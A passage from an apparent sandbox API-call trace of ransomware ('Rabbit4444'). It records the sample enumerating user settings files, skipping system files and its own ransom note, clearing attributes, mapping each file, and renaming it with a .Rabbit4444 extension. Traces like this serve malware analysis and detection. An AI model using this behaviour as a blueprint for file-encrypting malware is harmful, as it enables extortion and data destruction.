| out: hHeap=0xe0000) returned 1 [0057.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.990] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14930059530) returned 1 [0057.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0057.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.990] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.990] CloseHandle (hObject=0x298) returned 1 [0057.990] CloseHandle (hObject=0x278) returned 1 [0057.990] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms.Rabbit4444") returned 188 [0057.990] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_startup_advancedstartup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Startup_AdvancedStartup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_startup_advancedstartup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.991] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cd6dbc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x39cd6dbc, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", cAlternateFileName="AAE739~1.SET")) returned 1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2=".") returned 1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="..") returned 1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="windows") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="boot") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.991] lstrcmpiW (lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.991] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms") returned="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms" [0057.991] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.992] lstrlenW (lpString="AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms") returned 59 [0057.992] lstrlenW (lpString="Rabbit4444") returned 10 [0057.992] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.992] lstrlenW (lpString=".dll") returned 4 [0057.992] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.992] lstrlenW (lpString=".lnk") returned 4 [0057.992] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.992] lstrlenW (lpString=".ini") returned 4 [0057.992] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.992] lstrlenW (lpString=".sys") returned 4 [0057.992] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.992] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_linktoplacespage.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.992] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.992] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14930295086) returned 1 [0057.992] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1235) returned 1 [0057.992] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.992] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.992] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.993] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.994] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.995] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14930546465) returned 1 [0057.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.995] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.995] CloseHandle (hObject=0x298) returned 1 [0057.995] CloseHandle (hObject=0x278) returned 1 [0057.995] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms.Rabbit4444") returned 187 [0057.995] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_linktoplacespage.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_LinkToPlacesPage.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_linktoplacespage.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.996] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d6f749, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x39d6f749, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", cAlternateFileName="AA9698~1.SET")) returned 1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.996] lstrcmpiW (lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.996] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms") returned="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms" [0057.996] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.997] lstrlenW (lpString="AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms") returned 59 [0057.997] lstrlenW (lpString="Rabbit4444") returned 10 [0057.997] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.997] lstrlenW (lpString=".dll") returned 4 [0057.997] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.997] lstrlenW (lpString=".lnk") returned 4 [0057.997] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.997] lstrlenW (lpString=".ini") returned 4 [0057.997] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.997] lstrlenW (lpString=".sys") returned 4 [0057.997] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.997] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_moretilesenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.997] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.997] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14930801391) returned 1 [0057.997] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1235) returned 1 [0057.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.997] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.998] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0058.000] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14931057680) returned 1 [0058.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0058.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0058.000] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.000] CloseHandle (hObject=0x298) returned 1 [0058.000] CloseHandle (hObject=0x278) returned 1 [0058.000] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms.Rabbit4444") returned 187 [0058.000] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_moretilesenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_MoreTilesEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_moretilesenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.001] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e080be, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x39e080be, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", cAlternateFileName="AA3E10~1.SET")) returned 1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2=".") returned 1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="..") returned 1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="windows") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="boot") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.001] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.001] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms") returned="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms" [0058.002] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.006] lstrlenW (lpString="AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms") returned 69 [0058.006] lstrlenW (lpString="Rabbit4444") returned 10 [0058.006] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.006] lstrlenW (lpString=".dll") returned 4 [0058.006] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.006] lstrlenW (lpString=".lnk") returned 4 [0058.006] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.006] lstrlenW (lpString=".ini") returned 4 [0058.006] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.006] lstrlenW (lpString=".sys") returned 4 [0058.006] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_showrecentlyaddedappsgroup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.006] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.006] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14931690442) returned 1 [0058.006] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1285) returned 1 [0058.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0058.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.006] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0058.008] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0058.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.009] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.010] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14932038839) returned 1 [0058.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0058.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.010] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.010] CloseHandle (hObject=0x298) returned 1 [0058.010] CloseHandle (hObject=0x278) returned 1 [0058.010] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms.Rabbit4444") returned 197 [0058.010] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_showrecentlyaddedappsgroup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Start_ShowRecentlyAddedAppsGroup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_showrecentlyaddedappsgroup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.011] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a0b6b17, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3a0b6b17, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", cAlternateFileName="AAE680~1.SET")) returned 1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2=".") returned 1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="..") returned 1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="windows") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="boot") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.011] lstrcmpiW (lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.011] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms") returned="AAA_SystemSettings_Start_ShowSuggestedAppsGroup.settingcontent-ms" [0058.011] SetFileAttributesW 